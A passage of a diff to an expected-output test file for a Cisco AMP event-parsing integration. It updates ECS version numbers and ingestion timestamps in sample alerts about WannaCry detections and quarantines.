found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -1448,7 +1448,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ 
@@ -1478,7 +1478,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:23.854021268Z", + "ingested": "2021-09-13T18:07:55.452505304Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419187549993959000,\"timestamp\":1610625537,\"timestamp_nanoseconds\":193000000,\"date\":\"2021-01-14T11:58:57+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419187549993959449\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"},\"parent\":{\"process_id\":2980,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}}", "kind": "alert", "action": "Threat Detected", 
@@ -1548,7 +1548,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ 
@@ -1580,7 +1580,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:23.854023153Z", + "ingested": "2021-09-13T18:07:55.452507280Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419187537109058000,\"timestamp\":1610625534,\"timestamp_nanoseconds\":853000000,\"date\":\"2021-01-14T11:58:54+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419187537109057560\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":2980,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}}", "kind": "alert", "action": "Threat Detected", 
@@ -1637,7 +1637,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -1657,7 +1657,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:23.854025059Z", + "ingested": "2021-09-13T18:07:55.452509223Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419187537109058000,\"timestamp\":1610625534,\"timestamp_nanoseconds\":884000000,\"date\":\"2021-01-14T11:58:54+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419187537109057560\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Threat Quarantined", @@ -1703,7 +1703,7 @@ { "@timestamp": "2021-01-14T11:49:08.000Z", "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -1721,7 +1721,7 @@ "event": { "severity": 0, "action": "Policy Update", - "ingested": "2021-09-12T17:32:23.854026933Z", + "ingested": "2021-09-13T18:07:55.452511138Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6583853374897127000,\"timestamp\":1610624948,\"timestamp_nanoseconds\":562000000,\"date\":\"2021-01-14T11:49:08+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_MAP_FriedEx\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"04:e6:4d:d5:7a:b5\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}", "id": "6583853374897127000", "kind": "alert" @@ -1768,7 +1768,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -1788,7 +1788,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:32:23.854028807Z", + "ingested": "2021-09-13T18:07:55.452575444Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":14945825043963,\"timestamp\":1610624472,\"timestamp_nanoseconds\":496121997,\"date\":\"2021-01-14T11:41:12+00:00\",\"event_type\":\"Executed malware\",\"event_type_id\":1107296272,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610624472,\"start_date\":\"2021-01-14T11:41:12+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"},\"parent\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}}", "kind": "alert", "start": "2021-01-14T11:41:12.000Z", @@ -1849,7 +1849,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -1869,7 +1869,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:32:23.854030779Z", + "ingested": "2021-09-13T18:07:55.452580334Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":14945825043964,\"timestamp\":1610624472,\"timestamp_nanoseconds\":498576872,\"date\":\"2021-01-14T11:41:12+00:00\",\"event_type\":\"Multiple Infected Files\",\"event_type_id\":1107296258,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610624472,\"start_date\":\"2021-01-14T11:41:12+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"},\"parent\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}}", "kind": "alert", "start": "2021-01-14T11:41:12.000Z", @@ -1925,7 +1925,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -1945,7 +1945,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:32:23.854032652Z", + "ingested": "2021-09-13T18:07:55.452582349Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533671599780921000,\"timestamp\":1610623726,\"timestamp_nanoseconds\":440000000,\"date\":\"2021-01-14T11:28:46+00:00\",\"event_type\":\"Retrospective Quarantine\",\"event_type_id\":553648155,\"detection_id\":\"6533671595485954049\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Exploit_Prevention_Audit\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"d2:78:15:4a:f4:a2\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"fce5b6784dc9f44cdc1d6214bb7b68d3029db049dcaf734edc9660bb3373bc79\"}}}}", "kind": "alert", "action": "Retrospective Quarantine", @@ -2000,7 +2000,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -2026,7 +2026,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:32:23.854034528Z", + "ingested": "2021-09-13T18:07:55.452584295Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533671595485954000,\"timestamp\":1610623725,\"timestamp_nanoseconds\":899000000,\"date\":\"2021-01-14T11:28:45+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.FCE5B6784D-100.SBX.TG\",\"detection_id\":\"6533671595485954049\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Exploit_Prevention_Audit\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"d2:78:15:4a:f4:a2\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"pp32.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\pp32.exe\",\"identity\":{\"sha256\":\"fce5b6784dc9f44cdc1d6214bb7b68d3029db049dcaf734edc9660bb3373bc79\",\"sha1\":\"bdb11107a33eaeded6a838eb2a0e6167637dbe9c\",\"md5\":\"5df0c4ebca109779dc8afc745d612637\"}}}}", "kind": "alert", "action": "Retrospective Detection", @@ -2079,7 +2079,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -2099,7 +2099,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:23.854036408Z", + "ingested": "2021-09-13T18:07:55.452586210Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179222052372000,\"timestamp\":1610623598,\"timestamp_nanoseconds\":453000000,\"date\":\"2021-01-14T11:26:38+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419179222052372503\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -2156,7 +2156,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ 
@@ -2186,7 +2186,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:23.854038307Z", + "ingested": "2021-09-13T18:07:55.452588141Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179222052372000,\"timestamp\":1610623598,\"timestamp_nanoseconds\":437000000,\"date\":\"2021-01-14T11:26:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419179222052372503\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -2239,7 +2239,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -2259,7 +2259,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:23.854040200Z", + "ingested": "2021-09-13T18:07:55.452590049Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179217757405000,\"timestamp\":1610623597,\"timestamp_nanoseconds\":875000000,\"date\":\"2021-01-14T11:26:37+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419179217757405206\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -2314,7 +2314,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -2334,7 +2334,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:23.854042089Z", + "ingested": "2021-09-13T18:07:55.452592053Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179217757405000,\"timestamp\":1610623597,\"timestamp_nanoseconds\":361000000,\"date\":\"2021-01-14T11:26:37+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419179213462437901\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -2389,7 +2389,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -2409,7 +2409,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:23.854043976Z", + "ingested": "2021-09-13T18:07:55.452593968Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179217757405000,\"timestamp\":1610623597,\"timestamp_nanoseconds\":329000000,\"date\":\"2021-01-14T11:26:37+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419179204872503300\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -2466,7 +2466,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ 
@@ -2496,7 +2496,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:23.854045878Z", + "ingested": "2021-09-13T18:07:55.452595861Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179217757405000,\"timestamp\":1610623597,\"timestamp_nanoseconds\":797000000,\"date\":\"2021-01-14T11:26:37+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419179217757405206\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -2549,7 +2549,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -2569,7 +2569,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:23.854047755Z", + "ingested": "2021-09-13T18:07:55.452597787Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179217757405000,\"timestamp\":1610623597,\"timestamp_nanoseconds\":329000000,\"date\":\"2021-01-14T11:26:37+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419179204872503298\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Threat Quarantined", @@ -2620,7 +2620,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -2640,7 +2640,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:23.854049645Z", + "ingested": "2021-09-13T18:07:55.452599647Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179217757405000,\"timestamp\":1610623597,\"timestamp_nanoseconds\":329000000,\"date\":\"2021-01-14T11:26:37+00:00\",\"event_type\":\"Threat 